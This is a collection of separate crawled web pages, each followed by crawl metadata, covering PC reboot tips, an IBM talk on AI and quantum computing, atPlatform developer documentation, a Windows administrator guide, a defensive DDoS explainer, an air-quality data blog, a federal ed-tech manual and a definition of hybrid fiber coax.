If you think that rebooting your computer will fix a problem, you should know that it’s one of the most immediate and simple ways to do so. These are some of the most common issues resolved by a system reboot:
- Is Windows moving slowly? If your Windows operating system is running slowly, you might have a program that’s using up all of your computer’s resources. While it’s possible to just open up your task manager and find the program that’s causing the trouble, you can reboot the operating system without needing to experiment.
- Do your programs eat up memory? Many programs, like Mozilla Firefox, are notorious for causing memory leaks. These can slow down your computer and make it difficult to accomplish any work. Restarting your computer gives you a chance to start fresh.
- Are you having Internet or network problems? This doesn’t just apply to your PC. This advice can apply to any computing hardware that you use on a daily basis, like Internet routers, modems, etc. If it’s not working the way it should, try restarting it. Unplug it and plug it back in. This is what’s known as a hard reset, and can be an easy fix to a difficult problem. Keep in mind that it won’t fix major problems, but it should be a solid go-to strategy for troubleshooting minor technical difficulties.
If you’ve ever tried calling your computer manufacturer’s tech support, you’ve probably been asked several times if you’ve turned your computer off, and then back on again. Despite how repetitive this advice can be, it’s a pretty easy way to fix some technical problems.
Bonus: Check out this funny clip from The IT Crowd, showcasing just how repetitive this response can seem.
If you’re still having issues with your technology, be sure to contact the professional IT technicians at CTN Solutions. | <urn:uuid:ab5aa668-e94a-48bd-b10c-9ac5ababb30c> | CC-MAIN-2024-38 | https://ctnsolutions.com/why-does-rebooting-your-pc-take-care-of-so-many-issues/ | 2024-09-14T04:01:14Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651548.18/warc/CC-MAIN-20240914025441-20240914055441-00056.warc.gz | en | 0.936177 | 781 | 2.75 | 3 |
Dario Gil, senior vice president and director of IBM Research, gave a talk this week at the online CES 2021 conference where he discussed the acceleration of resolving challenges through quantum computers, AI, and hybrid cloud.
He said the urgency of science has never been greater considering the pandemic but also for other global issues to come, which could include food shortages, climate change, and energy security. “What we really need to do is accelerate the rate of discovery to solve some of the world’s most pressing problems,” Gil said.
Technologies such as hybrid cloud, quantum computing, and AI could change that process and supercharge traditional scientific methods, he said. The process of classic trial and error, experimentation and testing can be slow, Gil said, though the advent of computers advanced the scientific paths to discovery.
IBM has been on a bit of a campaign of late to display its grounding in the further development of AI and the promises of quantum computing. Its compute resources have already been part of the vaccine research landscape, and it has been weaving AI into cloud migration. In addition to furthering those conversations, Gil’s talk via CES also showed how the conference, known historically for its consumer electronics announcements, continues to increase its attention on technology implemented by enterprises and industry.
The growing power of AI enables new levels of speed, automation, and scale, Gil said. This can also help solve complex problems. He offered an example of the hypothetical creation of a new, recyclable plastic. “We can use AI to sift through the existing knowledge on polymer manufacturing to see all the previous research, patents, and fabrication attempts and form a knowledge base,” he said.
From there, quantum computers would conduct simulations to augment that knowledge base, Gil said. AI models could identify gaps in knowledge and propose candidate molecules to create the new plastic. Knowledge gained through such a process could lead to new questions to be answered, he said. “This would be a continual loop of discovery, increasingly automated and increasingly autonomous.”
Hybrid cloud ties such resources as quantum and supercomputers together, creating a medium for them to function together, Gil said. A single IBM Z systems mainframe could process one trillion web transactions in one day, he said. IBM also developed supercomputers for national laboratories, such as IBM Summit at the Oak Ridge National Laboratory, which was put to work on COVID-19 research.
“It is capable of processing 200,000 trillion calculations per second,” Gil said. Even with such resources, he said there are problems supercomputers cannot solve because the problems and ways to respond to them can grow exponentially.
“Quantum computers will change this,” Gil said. “They offer a powerful alternative because they combine physics with information to compute in a fundamentally different way.” The principles of quantum mechanics and quantum algorithms in this class of computing can lead to faster, more accurate answers than prior technology. “They should be able to simulate new molecules that classical computers never could,” Gil said.
Hybrid cloud is a way to deploy these innovations, he said, and make them available across the globe. Using the cloud to unify technologies could provide near-limitless pools of computing, Gil said. All the elements contribute to what he called accelerated discovery. “This new method should give us the discovery-driven enterprise,” Gil said.
With accelerated discovery, he said the typical 10-year timeframe to discover new materials and then bring them to market at a production cost of $10 million to $100 million could be shortened potentially to one year and $1 million. “We want to cut the cost down by 90%,” Gil said. The hope is to introduce more efficient and sustainable ways of creating new materials. “It’s really about complementing and scaling human expertise,” he said.
Technology on this front, such as the IBM RXN for Chemistry cloud-based AI tool, has already been put to work in the development of autonomous labs, Gil said, to automate chemical synthesis, predict chemical reactions, and decrease production time while increasing reliability. “This shows how hybrid cloud is becoming a key technological factor to revolutionize several fields,” he said. “Anywhere you have an internet connection, you have a chemical lab in your hands.”
The atPlatform allows people, entities and things to communicate privately and securely without having to know about the intricacies of the underlying IP network. The atProtocol is the application protocol used to communicate and atSigns are the addresses on the protocol. All cryptographic keys are cut at the edge by the atSign owner, meaning only the receiving and sending atSigns see data in the clear.
The atPlatform can be used to send data synchronously or asynchronously and can be used as a data plane or a control plane or both simultaneously at Internet scale.
An atServer is both a personal data service for storing encrypted data owned by an atSign, and a rendezvous point for information exchange. An atServer is responsible for the delivery of encrypted information to other atServers, from which the owners of those atSigns can then retrieve the data.
Unless explicitly made public, atServers only store encrypted data and do not have access to the cryptographic keys, nor the ability to decrypt the stored information.
In order for an atSign to communicate with another one on the internet, we need to locate the atServer that can send and receive information securely on its behalf.
The location of an atServer is found using the atDirectory service (root.atsign.org:64). This directory returns the DNS address and port number of the atServer for any atSign that it has a record for. The atDirectory service contains no information about the owner of the atSign.
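As an illustration, the lookup itself is a short question-and-answer exchange over TLS. The following Python sketch is a simplified approximation: it assumes the atDirectory accepts a newline-terminated atSign (without the @) and replies with the atServer’s host:port, or null if no record exists:

```python
# Minimal sketch of an atDirectory lookup, assuming a TLS service on
# root.atsign.org:64 that answers "<host>:<port>" for a known atSign.
import socket
import ssl

def lookup_atsign(atsign: str) -> str:
    context = ssl.create_default_context()
    with socket.create_connection(("root.atsign.org", 64), timeout=10) as raw:
        with context.wrap_socket(raw, server_hostname="root.atsign.org") as tls:
            tls.sendall(atsign.lstrip("@").encode() + b"\n")
            reply = tls.recv(1024).decode().strip()
    return reply  # e.g. a host:port pair, or "null" if no record exists

print(lookup_atsign("@alice"))
```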
The atProtocol communicates via layer 7, the application layer of the OSI model, over TCP/IP.
atSDKs provide developers with atPlatform specific building tools in a number of languages and for a number of operating systems and hardware. The atSDK allows developers to rapidly develop applications that use the atPlatform. | <urn:uuid:7121d645-96c7-4869-b401-51a7087d8701> | CC-MAIN-2024-38 | https://docs.atsign.com/core | 2024-09-17T19:48:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651829.57/warc/CC-MAIN-20240917172631-20240917202631-00656.warc.gz | en | 0.8854 | 373 | 2.59375 | 3 |
In the world of computing and networking, Administrators play a pivotal role. They serve as the linchpins responsible for ensuring that systems are secure, efficient, and functional. While the core responsibilities remain largely consistent across different operating systems and network architectures, the tools, processes, and capabilities can differ significantly. This article aims to shed light on the multifaceted role of Administrators, with a special focus on Windows Systems, to offer a nuanced understanding of what it takes to manage complex computing environments.
In this article:
- What is an Administrator?
- Types of Administrators
- Common Tools Used by Administrators
- Administrator in Windows Systems
- Best Practices for Administrators
- Administrator vs. Superuser
- Becoming an Administrator
1. What is an Administrator?
An Administrator in the context of computing and networking is an individual—or a system role—empowered with permissions to configure, manage, and oversee a computer system, network, or application. The Administrator role serves as the highest level of access, granting the ability to alter system settings, manage user accounts, and implement security protocols among other functions.
Administrators are tasked with a myriad of responsibilities aimed at maintaining the seamless operation of computing environments. Here are some of the key responsibilities:
- System Configuration: Installing, configuring, and maintaining software and hardware components.
- User Management: Creating, managing, and removing user accounts and roles, along with the assignment and adjustment of permissions.
- Security Oversight: Implementing and enforcing security measures such as firewalls, antivirus software, and data encryption.
- Resource Allocation: Managing system resources like CPU, memory, and disk space to ensure optimal performance.
- Backup and Recovery: Ensuring data is regularly backed up and readily restorable in the event of system failure or data loss.
- Monitoring and Auditing: Keeping an eye on system performance and user activities, often utilizing specialized monitoring tools.
- Update and Patch Management: Installing timely updates and patches to keep the system secure and up-to-date.
- Troubleshooting: Identifying and resolving system and network issues, often under time-sensitive conditions.
- Documentation: Keeping detailed records of system configurations, policies, and procedures for future reference and compliance audits.
You can rename the default Administrator account, but you cannot delete it. If you rename the account, make sure you remember what the new name is!
2. Types of Administrators
System Administrators, often abbreviated as SysAdmins, are responsible for overseeing individual systems or an entire system network. They handle tasks like server maintenance, operating system updates, and user management. Given their broad mandate, SysAdmins often work closely with other types of administrators to ensure holistic system health.
Network Administrators are specifically focused on network infrastructure, including hardware like switches, routers, and firewalls, as well as network protocols and configurations. Their primary goals are to ensure network availability, optimize data transfer rates, and implement security measures such as firewalls and intrusion detection systems.
Database Administrators (DBAs) specialize in managing databases. Their responsibilities include database design, implementation, maintenance, and security. They are well-versed in database languages like SQL and are responsible for activities like data backup and recovery, performance tuning, and data migration.
3. Common Tools Used by Administrators
System Monitoring Tools
System monitoring is crucial for any administrator looking to ensure optimal performance and stability. Key tools in this category include:
- Nagios: A comprehensive monitoring solution that tracks system performance, network protocols, and applications.
- SolarWinds Server & Application Monitor: Offers real-time monitoring and customized reporting.
- Zabbix: An open-source tool that provides network and application monitoring.
- Windows Performance Monitor: A native Windows tool that provides real-time monitoring for various system resources.
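For quick scripted checks alongside these suites, a minimal sketch using the third-party psutil library (an assumption; the alert thresholds are illustrative) can sample the same resources:

```python
# Minimal sketch: resource checks similar to what monitoring suites track.
# pip install psutil
import psutil

CPU_ALERT = 90.0   # percent; illustrative thresholds
MEM_ALERT = 85.0
DISK_ALERT = 90.0

cpu = psutil.cpu_percent(interval=1)
mem = psutil.virtual_memory().percent
disk = psutil.disk_usage("/").percent

for name, value, limit in [("CPU", cpu, CPU_ALERT),
                           ("Memory", mem, MEM_ALERT),
                           ("Disk", disk, DISK_ALERT)]:
    status = "ALERT" if value >= limit else "ok"
    print(f"{name}: {value:.1f}% ({status})")
```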
Network Management Tools
Effective network management is pivotal for maintaining a robust and secure IT infrastructure. Notable tools in this segment are:
- Wireshark: A network protocol analyzer that lets administrators capture and interactively browse the traffic running on a computer network.
- NetFlow Analyzer: Provides in-depth visibility into network traffic patterns and bandwidth utilization.
- Cisco’s Network Assistant: A network management tool specifically designed for Cisco network solutions, offering a graphical view of network data.
- PuTTY: A terminal emulation program used for remotely accessing network devices.
Security Tools

The security of a network is non-negotiable. Administrators deploy various tools to protect the network from internal and external threats. These tools include:
- Firewall Software: Tools like pfSense or Windows Firewall help in packet filtering and network traffic management.
- Antivirus Programs: Solutions like Windows Defender and McAfee offer real-time protection against malware and other threats.
- Intrusion Detection Systems (IDS): Tools such as Snort help in monitoring inbound and outbound network traffic for suspicious activities.
- Virtual Private Networks (VPN): Software like OpenVPN ensures secure and encrypted communication over a public network.
4. Administrator in Windows Systems
What Sets Them Apart?
Administrators in Windows Systems are distinguished by their intricate involvement with the Windows ecosystem. This specialized environment allows for a distinct set of tools, features, and protocols. Moreover, Windows Administrators often have to deal with a blend of desktop and server operating systems—ranging from Windows 10 to Windows Server editions—that require specific skill sets and expertise.
Windows-specific Tools and Features
Windows Administrators have a rich array of dedicated tools at their disposal. Some of these are:
- Windows Server Manager: A management console that allows administrators to configure and manage both local and remote Windows-based servers.
- PowerShell: A task automation framework that provides a command-line shell and a scripting language, specialized for system administration tasks.
- Active Directory: A directory service that enables centralized management of network resources, including users and devices.
- Group Policy: A feature that allows admins to implement specific configurations for users and computers within an Active Directory environment.
- Windows Defender: The built-in antivirus and threat detection tool that can be centrally managed by administrators.
- Task Scheduler: Allows for the automation of scripts and software at pre-defined times or after specified time intervals.
User Account Control (UAC) and Permissions
User Account Control (UAC) is a security component in Windows. It limits application software to standard user privileges until an administrator authorizes an elevation of privilege. This is essential for:
- Preventing Unauthorized Access: UAC notifications are triggered when potentially harmful actions are initiated, requiring administrative consent.
- Principle of Least Privilege: UAC enables administrators to allocate minimal necessary access, or permissions, to software and files, thereby enhancing security.
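Administration scripts can check up front whether they are running elevated. Here is a minimal sketch using the Windows shell API via the standard-library ctypes module (Windows-only):

```python
# Minimal sketch: detect whether the current process is elevated on Windows.
import ctypes

def is_admin() -> bool:
    try:
        return bool(ctypes.windll.shell32.IsUserAnAdmin())
    except (AttributeError, OSError):
        return False  # non-Windows platform or API unavailable

if is_admin():
    print("Running with administrative privileges.")
else:
    print("Standard user context - UAC elevation required for admin tasks.")
```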
5. Best Practices for Administrators
- Regular Patch Management: Ensure that all systems are regularly updated with the latest security patches.
- Use Role-based Access Control: Assign permissions based on roles within the organization rather than to individual users.
- Enable Logging and Monitoring: Utilize Windows Event Logs to track user activity and system changes.
- Secure Administrative Accounts: Use strong, unique passwords and multi-factor authentication for all administrative accounts.
- Regular Audits: Periodic system and security audits are essential to identify potential vulnerabilities.
- Backup and Disaster Recovery: Maintain regular backups and establish a robust disaster recovery plan.
- System Hardening: Minimize system vulnerabilities by turning off unnecessary services and closing unused network ports.
- Use Firewall Rules: Implement and maintain a well-defined set of firewall rules to control inbound and outbound network traffic.
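To act on the logging and monitoring practice above, here is a minimal sketch that reads recent System event log entries using the pywin32 package (an assumption; Windows-only):

```python
# Minimal sketch: read recent entries from the Windows System event log.
# pip install pywin32
import win32evtlog

log = win32evtlog.OpenEventLog(None, "System")  # None = local machine
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | win32evtlog.EVENTLOG_SEQUENTIAL_READ

events = win32evtlog.ReadEventLog(log, flags, 0)
for event in events[:10]:  # newest first, first batch only
    # Mask off severity bits to get the familiar event ID number.
    print(event.TimeGenerated, event.SourceName, event.EventID & 0xFFFF)

win32evtlog.CloseEventLog(log)
```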
6. Administrator vs. Superuser
While the terms “Administrator” and “Superuser” are often used interchangeably, they have nuanced differences and similarities, especially when comparing Windows Systems with UNIX-based systems like Linux.
- Operating System Specificity: The term “Administrator” is commonly used in the context of Windows, whereas “Superuser,” often denoted as ‘root’ in UNIX-based systems, is prevalent in Linux and macOS.
- Level of Control: Both Administrator and Superuser have the highest level of system control, but Superuser in UNIX-based systems often has unfettered access to the entire system without the restrictions that UAC might impose in Windows.
- Account Type: In Windows, the Administrator account is often a separate account that can be assigned to one or more users. In UNIX-based systems, the Superuser is generally a single account named ‘root.’
- Security Implications: Because of its unrestricted access, the Superuser account can pose a greater security risk if compromised, as compared to an Administrator account with UAC enabled.
- Common Responsibilities: Both are responsible for system setup, maintenance, and security, although the specific tasks may differ based on the operating system.
7. Becoming an Administrator
- Networking Fundamentals: A strong grasp of networking principles is vital.
- Operating System Proficiency: Familiarity with the ins and outs of the relevant operating systems, whether it’s Windows, Linux, or macOS.
- Scripting and Automation: Skills in scripting languages like PowerShell or Bash for task automation.
- Security Best Practices: Understanding of firewalls, encryption, and intrusion detection systems.
- Problem-solving: Strong analytical skills to troubleshoot issues efficiently.
For those looking to formalize their skills, several certification paths are available:
- Microsoft Certified: Azure Administrator Associate: For those focusing on Windows environments, particularly Azure.
- CompTIA A+ and Network+: Good starting points that cover essential IT skills.
- CCNA (Cisco Certified Network Associate): For those looking to specialize in network administration.
- RHCE (Red Hat Certified Engineer): Useful for UNIX-based system administrators.
- Certified Information Systems Security Professional (CISSP): For those looking to focus on security.
The role of an Administrator is crucial in any computing environment. This article has delved into the specifics of what sets an Administrator apart in the Windows ecosystem and highlighted the key best practices that apply universally across different platforms. Whether you are an Administrator or aspire to become one, understanding the different facets of this role can empower you to manage and secure complex computing environments effectively.
What is a DDoS attack?
A distributed denial-of-service attack (DDoS attack) sees an attacker flooding the network or servers of the victim with a wave of internet traffic so big that their infrastructure is overwhelmed by the number of requests for access, slowing down services or taking them fully offline and preventing legitimate users from accessing the service at all.
While a DDoS attack is one of the least sophisticated categories of cyberattack, it also has the potential to be one of the most disruptive and most powerful by taking websites and digital services offline for significant periods of time that can range from seconds to even weeks at a time.
How does a DDoS attack work?
DDoS attacks are carried out using a network of internet-connected machines: PCs, laptops, servers, and Internet of Things devices, all controlled by the attacker. These could be anywhere, and it’s unlikely the owners of the devices realize what they are being used for, as they have likely been hijacked by hackers.
Common ways in which cyber criminals take control of machines include malware attacks and gaining access by using the default username and password the product is issued with, if the device has a password at all.
Once the attackers have breached the device, it becomes part of a botnet, a group of machines under their control. Botnets can be used for all manner of malicious activities, including distributing phishing emails, malware, or ransomware, or in the case of a DDoS attack, as the source of a flood of internet traffic.
The size of a botnet can range from a small number of zombie devices to millions of them. Either way the botnet’s controllers can turn the web traffic generated towards a target and conduct a DDoS attack.
Servers, networks, and online services are designed to cope with a certain amount of internet traffic but, if they’re flooded with additional traffic in a DDoS attack, they become overwhelmed. The high volumes of traffic sent by the DDoS attack clog up or take down the systems’ capabilities, while also preventing legitimate users from accessing services (which is the ‘denial of service’ element).
A DDoS attack is launched with the intention of taking services offline in this way, although it’s also possible for online services to be overwhelmed by regular traffic by non-malicious users. For example, if hundreds of thousands of people are trying to access a website to buy concert tickets as soon as they go on sale. However, this is usually only short, temporary, and accidental, while DDoS attacks can be sustained for extended periods of time.
What is an IP stresser and how does it relate to DDoS attacks?
An IP stresser is a service that can be used by organisations to test the robustness of their networks and servers. The goal of this test is to find out if the existing bandwidth and network capacity are enough to handle additional traffic. An IT department using a stresser to test their own network is a perfectly legitimate application of an IP stresser.
However, using an IP stresser against a network that you don’t operate is illegal in many parts of the world because the end result could be a DDoS attack. However, there are cyber-criminal groups and individuals that will actively use an IP stresser as part of a DDoS attack.
How do I know if I’m under DDoS attack?
Any business or organisation that has a web-facing element needs to think about the regular web traffic it receives and provision for it accordingly; large amounts of legitimate traffic can overwhelm servers, leading to slow or no service, something that could potentially drive customers and consumers away. Organisations also need to be able to differentiate between legitimate web traffic and DDoS attack traffic.
Capacity planning is, therefore, a key element of running a website, with thought put into determining what’s an expected, regular amount of traffic and what unusually high or unanticipated volumes of legitimate traffic could look like, so as to avoid causing disruption to users either by taking out the site due to high demands, or mistakenly blocking access due to a DDoS false alarm.
So how can organisations differentiate between a legitimate increase in demand and a DDoS attack?
In general, an outage caused by legitimate traffic will only last for a very short period of time, and often there might be an obvious reason for the outage, such as an online retailer experiencing high demand for a new item, or a new video game’s online servers getting very high traffic from gamers eager to play.
In the case of a DDoS attack, there are some tell-tale signs that it’s a malicious and targeted campaign. Often DDoS attacks are designed to cause disruption over a sustained period of time, which could mean sudden spikes in malicious traffic at intervals causing regular outages.
The other key sign that your organisation has likely been hit with a DDoS attack is that services suddenly slow down or go offline for days at a time, which would indicate the services are being targeted by attackers who just want to cause as much disruption as possible. Some of these attackers might be doing it just to cause chaos; some may be paid to attack a particular site or service. Others might be trying to run some kind of extortion racket, promising to drop the attack in exchange for a pay-off.
Using our Ethical Hacking Services allows us to penetrate your computer system or network for the purpose of gaining access, finding security vulnerabilities, verifying user activity levels, and documenting said activities. As a result, this allows bva to true-up security holes, make systems more reliable, and secure commercial and personal data. So, you can stay protected against not just DDoS attacks but all other cyber threats as well.
What do I do if I’m under DDoS attack?
Once it’s become clear that you’re being targeted by DDoS attack, you should piece together a timeline of when the problems started and how long they’ve been going on for, as well as identifying which assets like applications, services and servers are impacted, how that’s negatively impacting users, customers and the business as a whole.
It’s also important that organisations notify their web-hosting provider. It’s likely that the provider will have also seen the DDoS attack, but contacting them directly may help curtail the impacts of a DDoS campaign, especially if it’s possible for the provider to switch your IP address. Switching the IP to a new address will mean that the DDoS attack won’t have the impact it did because the attack will be pointing in the wrong direction.
If your security provider provides a DDoS mitigation service, it should help reduce the impact of the attack, but especially large attacks can still cause disruption despite the presence of preventative measures. The unfortunate thing about DDoS attacks is that while they’re very simple to conduct, they’re also very effective, so it’s still possible that even with measures in place that services could be taken offline for some time.
It’s also important to notify users of the service about what is happening, because otherwise they could be left confused and frustrated by a lack of information. Businesses should consider putting up a temporary site explaining that there are problems and provide users with information they should follow if they need the service. Social-media platforms can also be used to promote this message.
How do I protect against DDoS attacks?
What makes DDoS attacks effective is the ability to direct a large amount of traffic at a particular target. If all of an organisation’s online resources are in one location, the attackers only need to go after one particular target to cause disruption with large amounts of traffic. If possible, it’s useful to spread systems out, so it’s more difficult, although not impossible, for attackers to direct resources towards everything at once.
Monitoring web traffic and having an accurate idea of what regular traffic looks like, and what abnormal traffic looks like, can also play a vital role in helping to protect against or spot DDoS attacks. Some security personnel recommend setting up alerts that notify you if the number of requests is above a certain threshold. While this might not necessarily indicate malicious activity, it does at least provide a potential early warning that something might be on the way.
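As a toy illustration of such an alert, the Python sketch below counts requests in a sliding one-minute window; the window and threshold are illustrative, and a real deployment would feed it from web server logs or a metrics pipeline:

```python
# Minimal sketch: alert when the request rate exceeds a threshold.
import time
from collections import deque

WINDOW_SECONDS = 60
THRESHOLD = 1000          # illustrative: expected peak legitimate rate

arrivals = deque()        # timestamps of recent requests

def record_request(now=None) -> bool:
    """Record one request; return True if the rate threshold is exceeded."""
    now = time.time() if now is None else now
    arrivals.append(now)
    # Drop timestamps that have aged out of the window.
    while arrivals and arrivals[0] < now - WINDOW_SECONDS:
        arrivals.popleft()
    return len(arrivals) > THRESHOLD

# Example: call this from an access-log tail or middleware hook.
if record_request():
    print("Possible DDoS: request rate above threshold - investigate.")
```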
It’s also useful to plan for scale and spikes in web traffic, which is something that using a cloud-based hosting provider can aid with.
Firewalls and routers can play an important role in mitigating the potential damage of a DDoS attack. If configured correctly, they can deflect bogus traffic by analyzing it as potentially dangerous and blocking it before it arrives. However, it’s also important to note that for this to work, firewall and security software needs to be patched with the latest updates to remain as effective as possible.
Using an IP stresser service can be an effective way of testing your own bandwidth capability. There are also specialist DDoS mitigation service providers that can help organisations deal with a sudden large upsurge in web traffic, helping to prevent damage by attacks.
What is a DDoS mitigation service?
DDoS attack mitigation services protect the network from DDoS attacks by re-routing malicious traffic away from the network of the victim. High profile DDoS mitigation service providers include Cloudflare, Akamai, Radware and many others.
The first job of a mitigation service is to be able to detect a DDoS attack and distinguish what’s actually a malicious event from what’s just a regular, if unusually high, volume of traffic.
Common ways DDoS mitigation services do this include judging the reputation of the IP addresses the majority of traffic is coming from. If it’s from somewhere unusual or known to be malicious, it could indicate an attack. Another way is looking out for common patterns associated with malicious traffic, often based on what’s been learned from previous incidents.
Once an attack has been identified as legitimate, a DDoS protection service will move to respond by absorbing and deflecting the malicious traffic as much as possible. This is helped along by routing the traffic into manageable chunks that will ease the mitigation process and help prevent denial-of-service.
How do I choose a DDoS mitigation service?
Choosing a DDoS mitigation service isn’t as simple as just selecting the first solution that appears. Organisations will need to choose a service based on their needs and circumstances. For example, a small business probably isn’t going to have any reason to fork out for the DDoS mitigation capabilities required by a global conglomerate.
However, if the organisation looking for a DDoS mitigation service is a large business, then they’re probably correct to look at large overflow capacities to help mitigate attacks. Looking at a network that has two or three times more capacity than the largest attacks known to date should be more than enough to keep operations online, even during a large DDoS attack.
While DDoS attacks can cause disruption from anywhere in the world, the geography and location of a DDoS mitigation service provider can be a factor. When deciding on a service provider, organisations should, therefore, consider the DDoS protection network in their region of the world to be the most effective.
Despite all the ways to potentially prevent a DDoS attack, sometimes attackers will still be successful anyway because if attackers really want to take down a service and have enough resources, they’ll do their best to be successful at it. However, if an organization is aware of the warning signs of a DDoS attack, it’s possible to be prepared for when it happens. | <urn:uuid:7174d4ea-be41-40e0-8ae2-7ad4c1b8be5b> | CC-MAIN-2024-38 | https://www.bvainc.com/2022/01/27/what-is-a-ddos-attack-everything-you-need-to-know-about-distributed-denial-of-service-attacks-and-how-to-protect-against-them/ | 2024-09-19T01:46:55Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651944.55/warc/CC-MAIN-20240918233405-20240919023405-00556.warc.gz | en | 0.955813 | 2,411 | 3.390625 | 3 |
This week marks the 14th annual Air Quality Awareness Week in the U.S.[i] The theme for this year is “Better Air, Better Health!”, which is especially pertinent now. Air pollution is a major cause of death and disease affecting the lungs and heart, killing an estimated seven million people worldwide every year according to the World Health Organization (WHO). The data shows that 90% of people breathe polluted air, the majority of which are in urban areas.[ii] Moreover, recent research shows that areas with higher levels of air pollution may experience more severe impact from pandemics such as COVID-19.[iii] The good news is that lockdowns and remote working are having a massive impact on clearing the air as the before/after photos of Los Angeles, California below illustrate.
Source: Business Insider[iv]
However, that is not expected to last when cities begin to reopen, so imagine if your phone could alert you when the local air quality was unsafe so you could decide whether to stay home or wear a mask to go out. Or, if you are driving, your car could automatically detect air pollution and switch on the air filter while suggesting alternate routes that were less polluted. On the flip side, if governments and businesses are informed when the air quality in their community reaches hazardous levels, they could make better decisions about shutting down or moving to virtual operations until it improves. Getting to this level of insight will require trusted data exchange between multiple parties with governance models that address data privacy concerns. By directly interconnecting multiple parties, a trusted data exchange can generate deeper insights and shared value while keeping data private and safe in transit.
Air quality monitoring in North America
Most governments around the world already have air quality monitoring systems in place. In the U.S. and Canada, the national/federal government captures air quality data from sensors and other monitoring devices, which is publicly shared on their websites.[v] And while these agencies don’t typically push real-time alerts or action recommendations, there are a number of companies developing innovative approaches for delivering intelligent air quality insights to agencies, citizens and businesses in North America. For example: [vi]
- The AIR app by Plume Labs goes beyond the public air quality data provided by the government. It also integrates land-based measurements with satellite imagery and machine learning (ML) models to deliver air quality reports and pollution forecasts. The company also sells a personal air quality sensor that can provide real-time localized air quality information on the app, and this data is fed back into the ML algorithms to improve the accuracy over time.
- The BreezoMeter app provides real-time, location-based air quality data in 90+ countries by collecting data from multiple nearby pollution stations, weather, wind direction/speed, time of day and other factors, combined with ML and artificial intelligence. The app delivers real-time localized air quality information, daily pollen counts, fire alerts and personalized health recommendations based on the insights. BreezoMeter also provides API access for businesses that want to tap into their data and algorithms for smart homes/buildings/cities, connected vehicles, medical devices and wearables and more.
- Air control agencies in several regional districts in Southern California use Envirosuite to monitor air quality and detect pollution sources in real-time. Envirosuite’s platform combines multiple sources of data on air quality, weather, emission rates, altitude and more with atmospheric dispersion ML models to provide precise air quality measurements and pollution forecasts. This enables agencies to respond more quickly with actions and plans to reduce air pollution.
Getting smarter while minding data privacy
Connecting data dots to detect high levels of air pollution in real-time and provide appropriate recommendations and actions is not difficult to solve from a technology point of view. However, it can be more challenging to solve from a regulatory and data privacy perspective. Digital surveillance is not generally accepted in North America except when it is for protecting public safety and even then it can be tricky. For example, in an effort to help track the spread of COVID-19, Apple and Google recently announced a rare joint collaboration to enable Bluetooth-based contact tracing features. And although the smartphone system is opt-in only, collects no location data from users and collects no data at all from anyone without a positive COVID-19 diagnosis, the announcement has still been met with some data privacy pushback.[vii] Alphabet’s Sidewalk Labs encountered similar pushback for its Toronto smart city project and initially scaled back its plans, but has since cancelled the initiative due to added market uncertainty from COVID-19.[viii]
Despite these challenges, data sharing is essential to deliver hyper-local/personalized insights. Notifying a vulnerable population with preexisting lung conditions about air pollution levels requires data to be exchanged between various smart devices across healthcare providers, governments, and the public/private sector. Privacy concerns can be alleviated through the use of data trusts to establish the right balance between data value and data protection, while private interconnection solutions like those on Platform Equinix® help ensure that any data and insights shared between multiple entities are exchanged safely and securely.
Download the Distributed Data blueprint to learn more.
You may also be interested in reading how Equinix is advancing green design and healthy offices in our latest sustainability report. | <urn:uuid:f63c82e1-6cf9-4a62-bb4d-32718bb804c3> | CC-MAIN-2024-38 | https://blog.equinix.com/blog/2020/05/08/better-air-better-health-in-the-u-s-and-canada-with-ai-iot/ | 2024-09-10T14:38:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651255.81/warc/CC-MAIN-20240910125411-20240910155411-00456.warc.gz | en | 0.931241 | 1,142 | 2.71875 | 3 |
Tapping into a booming market, Education Department officials crowdsourced ideas from developers, educators and researchers to put together the “Ed Tech Developer’s Guide: A Primer for Developer, Startups and Entrepreneurs.”
The first manual, unveiled Tuesday by Education Secretary Arne Duncan and Director of Educational Technology Richard Culatta, pinpoints gaps and opportunities to create effective digital tools that can be used in classrooms across the country.
“Technology makes it possible for us to create a different dynamic between a teacher and a classroom full of students. It can open up limitless new ways to engage kids, support teachers and bring parents into the learning process,” Duncan said during the ASU+GSV Summit, dubbed “Davos in the Desert,” in Scottsdale, Arizona.
“We need tools designed to help students discover who they are and what they care about, and tools that create portals to a larger world that, in the past, would have remained out of reach for far too many students,” Duncan continued.
According to the manual, “the demand for high-quality educational apps is increasing as communities become more connected, devices become more affordable, and teachers and parents are looking for new ways to use technology to engage students.”
Yet, it adds, “many existing solutions don’t address the most urgent needs in education.”
The manual encourages teachers and developers to think creatively to create interactive games and methods of teaching math, science, English, social studies and foreign languages rather than “digitizing” content by simply scanning a worksheet.
It also highlights certain apps like SchoolKit, which was created with help from a federal grant and draws on research about growth mindsets, an understanding that ability can be developed, not fixed.
The manual also offers information about appropriate Internet bandwidth for schools, resources to support network infrastructure and how more schools are turning to BYOD – bring your own device – programs.
Culatta said digital learning tools offer a more equitable learning experience for kids.
“Edtech tools have the potential to close the opportunity gap by providing access to rich educational experiences not available in all communities, for example, virtual labs and field trips, advanced coursework, access to field experts, and opportunities to interact with students around the world,” he said. | <urn:uuid:f94323eb-af9c-4046-9aba-66a0ae070799> | CC-MAIN-2024-38 | https://fedscoop.com/education-officials-unveil-new-ed-tech-manual-for-developers-teachers/ | 2024-09-10T13:15:38Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651255.81/warc/CC-MAIN-20240910125411-20240910155411-00456.warc.gz | en | 0.952978 | 486 | 2.9375 | 3 |
This blog post is part of a series called “CommScope Definitions” in which we will explain common terms in communications network infrastructure.
Hybrid fiber coax (HFC) is the term that describes the service delivery architecture used by cable operators and multi-system operators (MSO). The architecture includes a combination of fiber optic cabling and coaxial cabling to distribute video, data and voice content to/from the headend and the subscribers. Typically, the signals are transported from the headend through a hub, to within the last mile via fiber optic cable. As an example, for a service area ranging from 64 homes passed to 1,000* homes, the fiber optic cable ends in an HFC node. At this point, the optical signal is converted into a radio frequency (RF) signal and transmitted over coaxial cable to subscribers’ homes/businesses.
